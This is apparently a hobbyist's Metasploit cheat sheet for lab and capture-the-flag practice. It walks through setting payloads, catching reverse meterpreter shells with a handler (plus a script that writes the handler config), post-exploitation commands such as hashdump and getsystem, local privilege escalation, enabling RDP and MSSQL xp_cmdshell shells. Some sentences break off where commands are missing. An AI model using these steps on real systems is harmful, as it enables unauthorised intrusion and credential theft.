This page is just basic stuff I forget all the time. There are other Metasploit tips in sections where it's relevant.
Metasploit is so derp-easy that you can often exploit a machine by setting the remote IP in RHOST and hitting the pew-pew button.
But sometimes that doesn't work and you cry because you know you're just a lame script kiddie pretending to be a hacker. However, you can aspire to be a decent script kiddie by knowing how to use more advanced options in Metasploit.
Exploits might not work because of an unusual configuration or path issue. You can inspect the relevant options with either show options or show advanced and change them with set. The advanced section includes VERBOSE, which you can set to true to get more information about why an exploit isn't working:
    show advanced
    set VERBOSE true
You might also need to set the correct target:
    show targets
    set target [target number]
MS08-067 sometimes needs this because the module can't always identify the exact operating system version and language pack.
It's also important to pay attention to the default payload. Occasionally, you'll run into something weird like an Apache web server running on Windows, so the default Unix payload won't work.
Check and modify the payload:
    show payloads
    set payload [whatever]
To catch shells using meterpreter (the handler's payload has to match the one the exploit sends, so set it explicitly):
    use exploit/multi/handler
    set PAYLOAD [payload used by the exploit, e.g. windows/meterpreter/reverse_tcp]
    set LHOST [attack machine]
    set LPORT 443
    run
If you're VPNed into a lab, pay attention to the IP address. I've noticed that the first time this module runs, it defaults to eth0 and you have to restart it to use something like
Frequently used commands, mostly to enumerate a victim machine:
    getuid     # get current user
    sysinfo    # gets OS and hostname
    execute    # execute a command
    cd         # change directory
    pwd        # print working directory
    ls         # list files in current directory
    mkdir      # make a directory
    del        # delete a file
    cat        # read the contents of a file
    download   # download a file to your machine
    hashdump   # get contents of password file
    edit       # edit a file with vim
    rm         # delete a file
    rmdir      # remove directory
    upload     # upload a file to the victim
    ps         # list running processes
    migrate    # move the active process to a designated PID
    getpid     # get the current process ID (PID)
    kill       # terminate a process by PID
    ipconfig   # display network interfaces
    portfwd    # forward a port on the victim to a remote service
    route      # view or modify routing table
    getprivs   # get as many privileges as possible
    getsystem  # get Administrator
    reboot     # reboot the victim
    shutdown   # shut down the victim
    reg        # interact with the victim's registry
Meterpreter is nice because it lets you maintain multiple shell sessions and use local exploits against them. For example, the Rejetto exploit always seems to fire a few times and with meterpreter, you can catch every shell session with a single listener.
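As an added example (not from the original post), a small POSIX shell helper that builds a multi/handler resource script bound to the VPN interface rather than eth0 and keeps the listener running so every session from an exploit that fires several times lands on the one handler. The interface name tun0 and the payload windows/meterpreter/reverse_tcp are assumptions; change both to match your lab.

```shell
# Added example, not from the original post. Builds handler.rc for msfconsole -r.
# Assumptions: the VPN interface is "tun0" and the exploit's payload is
# windows/meterpreter/reverse_tcp; both are defaults you can override.

# Print the IPv4 address assigned to an interface, or nothing if it has none
# (or the interface does not exist). Uses iproute2's one-line output format.
iface_ip() {
    ip -4 -o addr show dev "$1" 2>/dev/null | awk '{ split($4, a, "/"); print a[1]; exit }'
}

# Emit the msfconsole resource script text for a handler on LHOST:LPORT.
# ExitOnSession false plus run -j keeps the job listening after the first
# session instead of exiting, so repeated callbacks all get caught.
build_handler_rc() {
    lhost=$1
    lport=$2
    payload=$3
    printf 'use exploit/multi/handler\n'
    printf 'set PAYLOAD %s\n' "$payload"
    printf 'set LHOST %s\n' "$lhost"
    printf 'set LPORT %s\n' "$lport"
    printf 'set ExitOnSession false\n'
    printf 'run -j\n'
}

# Write the resource script for the VPN interface. Fails loudly when the
# interface has no address instead of silently falling back to eth0.
write_handler_rc() {
    iface=${1:-tun0}
    lport=${2:-443}
    payload=${3:-windows/meterpreter/reverse_tcp}
    out=${4:-handler.rc}
    lhost=$(iface_ip "$iface")
    if [ -z "$lhost" ]; then
        echo "no IPv4 address on $iface; is the VPN up?" >&2
        return 1
    fi
    build_handler_rc "$lhost" "$lport" "$payload" > "$out"
    echo "wrote $out (LHOST=$lhost LPORT=$lport); start it with: msfconsole -r $out"
}
```

Run write_handler_rc with no arguments once the VPN is up, then start msfconsole -r handler.rc; sessions -l will show each caught session on the single job.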
To list active sessions:
    sessions -l
To enter a session:
sessions -i [session number]
To enter a shell from a session (not use meterpreter commands):
    shell
To exit the shell and return to meterpreter, type
I mostly use Metasploit on Windows machines because they still feel tricky to me. Below is a list of useful exploits for enumerating and running complex commands.
Once you have a meterpreter shell, you can scan for local exploits and run them. Unlike remote exploits, which target an IP address, local exploits run against a chosen shell session.
To access local exploits, you'll need to jump out of meterpreter using background and select one with the use command:
    meterpreter > background
    use exploit/windows/whatever
    show options
    [edit options as needed]
    set SESSION [session number]
    run
Check for exploits:
meterpreter > run post/multi/recon/local_exploit_suggester
Get a remote desktop:
meterpreter > run post/windows/manage/enable_rdp
Run a command as a different user:
    background
    use post/windows/manage/run_as
    [set username and password]
    set SESSION [session number]
    set CMDOUT true # output results of command
    set CMD "type C:\Users\Administrator\Desktop\root.txt"
    run
There are manual ways to run commands as different user but I haven't tried them because I'm lazy.
If you have credentials, you can use this module to get a shell:
    use exploit/windows/mssql/mssql_payload
    [set username and password]
    run
It uses the xp_cmdshell stored procedure, which isn't always enabled but can be. You could probably do the same exploit manually using a tool like DBeaver, but I haven't managed it yet. If you're attacking a very old version of MSSQL (e.g. 2000), you can connect to it using sqsh:
sqsh -S [remote host]:[port] -U [username] -P [password]
You can then attempt to launch xp_cmdshell with the following syntax: